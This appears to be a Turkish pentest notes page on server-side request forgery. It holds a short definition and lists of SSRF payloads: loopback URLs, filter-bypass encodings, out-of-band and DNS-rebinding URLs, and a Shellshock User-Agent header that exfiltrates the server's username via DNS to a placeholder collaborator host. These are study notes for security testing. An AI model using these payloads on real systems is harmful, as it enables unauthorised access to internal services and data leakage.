🖥️
Siber Güvenlik Notları
  • WHOAMI
    • 👨‍💻Who Am I?
  • 🔭Information Gathering
    • Pentest Makinası Kurulumu
    • Passive Information Gathering
    • Subdomain Enumeration
    • Host Discovery
    • Port Scanning
    • Email Enumeration
    • Leaked Passwords
    • Zafiyet Araştırma
  • 🪟Windows Pentesting
    • Windows Privilege Escalation
    • Windows Persistence
    • Windows Lateral Movement
    • AV Evasion
  • 🐧Linux Pentesting
    • Linux Privilege Escalation
    • Linux Persistence
    • Linux Lateral Movement
  • 🕸️Web Application Pentesting
    • ✅Cross-Site Scripting
    • ✅Information Disclosure
    • ✅Configuration and Deployment Management Testing
    • ✅Broken Authentication
    • ✅Broken Access Control
    • ✅OAuth Zafiyetleri
    • ✅JWT
    • ✅HTTP Parameter Pollution
    • ✅SQL Injection
    • ✅NoSQL Injection
    • ✅XXE Injection
    • ✅File Inclusion & Path Traversal
    • ✅OS Command Injection
    • ❌HTTP Request Smuggling
    • ✅Host Header Attack
    • ✅SSTI
    • ✅SSRF
    • ❌Insecure Deserialization
    • ✅Prototype pollution
    • ❌Web Cache Poisoning
    • ✅LLM
    • ✅Business Logic
    • ✅File Upload
    • ✅Race Conditions
    • ✅CSRF
    • ✅CORS Misconfiguration
    • ✅Clickjacking
    • ✅API Testing
    • ❌GraphQL API
    • AWS Testing
    • ✅Broken Link Hijacking
  • 🖲️Network Service Pentesting
    • 📘Active Directory Services
      • Bleeding Edge Vulns
      • Misconfigs
      • Domain Trust
      • DNS (53)
      • Kerberos (88)
      • LDAP (389,636)
      • RPC WMI (135)
      • SMB (445)
      • WinRM - 5985
    • 📂FTP - 21
    • 🔐SSH - 22
    • 🤣Telnet - 23
    • SMTP - 25
    • TFTP - 69 UDP
    • HTTP - 80,443
      • Apache
      • Joomla
      • Drupal
      • Wordpress
      • WEBDAV
      • PHP
      • Laravel
    • IMAP/POP3 - 110,143,993,995
    • SNMP - 161
    • Rservices - 512
    • IPMI - 623
    • Rsync - 873
    • MSSQL - 1433
    • Oracle TNS - 1521
    • NFS - 2049
    • Docker
    • Grafana - 3000
    • MySQL - 3306
    • RDP - 3389
    • Postgresql - 5432
    • Redis - 6379
    • JDWP - 8000
    • MongoDB - 27017
  • 🕸️Network Pentesting
    • ARP Poisoning
  • 📞Android Pentesting
    • Rooting
    • Burp Suite Sertifikası
    • SSL Pinning Bypass
    • Patching
    • MobSF Kurulumu
    • Flutter Pentesting
  • 📰Teori
    • Güvenlik Ürünleri
    • OSI
    • Security Principles
  • Diğer
    • Hacking Gadgets
      • 🍍Wifi Pineapple
      • Pwnagotchi
    • Stego
    • Buffer Overflow
    • Phishing
    • Nessus
    • MSFConsole
    • DDOS Saldırıları
  • ⏪Reverse
    • GCC Reverse
    • Python Reverse
    • Flare VM
    • Remnux
  • 🛜Wireless Pentesting
    • Wireless Pentest
Powered by GitBook
On this page

Was this helpful?

  1. Web Application Pentesting

SSRF

PreviousSSTINextInsecure Deserialization

Last updated 10 months ago

Was this helpful?

SSRF Nedir?

Server-side request forgery, bir saldırganın server-side uygulamasının istenmeyen bir yere istekte bulunmasına neden olan bir web güvenlik açığıdır.

Tipik bir SSRF saldırısında, saldırgan sunucunun kuruluşun altyapısındaki yalnızca dahili hizmetlere bağlantı kurmasına neden olabilir. Diğer durumlarda, sunucuyu rastgele harici sistemlere bağlanmaya zorlayabilirler. Bu, yetkilendirme kimlik bilgileri gibi hassas verilerin sızmasına neden olabilir.

Saldırı Yöntemleri

Basit SSRF

http://localhost:80
http://localhost:443
http://localhost:22

http://127.0.0.1:80
http://127.0.0.1:443
http://127.0.0.1:22

http://0.0.0.0:80
http://0.0.0.0:443
http://0.0.0.0:22

Blacklist Bypass

http://0/
http://127.1
http://127.0.1
http://2130706433/

Whitelist Bypass

http://127.0.0.1#@example.com
http://127.0.0.1%2523@example.com

Out of Band SSRF

http://COLLABORATOR

Open Redirect SSRF

http://example.com?redirect=127.0.0.1

DNS Rebinding SSRF

Rebinder: https://lock.cmpxchg8b.com/rebinder.html

http://7f000001.7f000001.rbndr.us

Shellshock

User-Agent: () { :; }; /usr/bin/nslookup $(whoami).COLLABORATOR

Kaynaklar

Portswigger Academy: https://portswigger.net/web-security/ssrf

🕸️
✅
  • SSRF Nedir?
  • Saldırı Yöntemleri
  • Basit SSRF
  • Blacklist Bypass
  • Whitelist Bypass
  • Out of Band SSRF
  • Open Redirect SSRF
  • DNS Rebinding SSRF
  • Shellshock
  • Kaynaklar